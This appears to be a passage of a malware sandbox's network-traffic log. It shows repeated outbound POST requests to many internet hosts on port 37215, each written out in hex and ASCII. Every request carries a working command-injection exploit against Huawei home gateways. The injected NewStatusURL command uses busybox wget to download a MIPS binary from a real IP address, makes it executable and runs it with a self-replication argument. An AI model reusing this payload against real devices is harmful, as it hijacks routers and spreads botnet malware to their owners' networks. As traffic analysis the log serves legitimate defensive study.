                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1835192.168.2.2354712157.227.172.10237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.587968111 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1836192.168.2.2350334157.33.234.637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.588000059 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1837192.168.2.2353208157.95.115.22037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.588027954 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1838192.168.2.236097641.168.12.8137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.588088036 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1839192.168.2.233529441.209.41.17337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.598213911 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1840192.168.2.2358614197.29.37.7837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.598242998 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1841192.168.2.233816642.90.158.4137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.598249912 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1842192.168.2.2337964157.106.197.7337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.598910093 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1843192.168.2.235801283.150.177.19737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.600646973 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1844192.168.2.2355498157.170.227.21737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.601600885 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
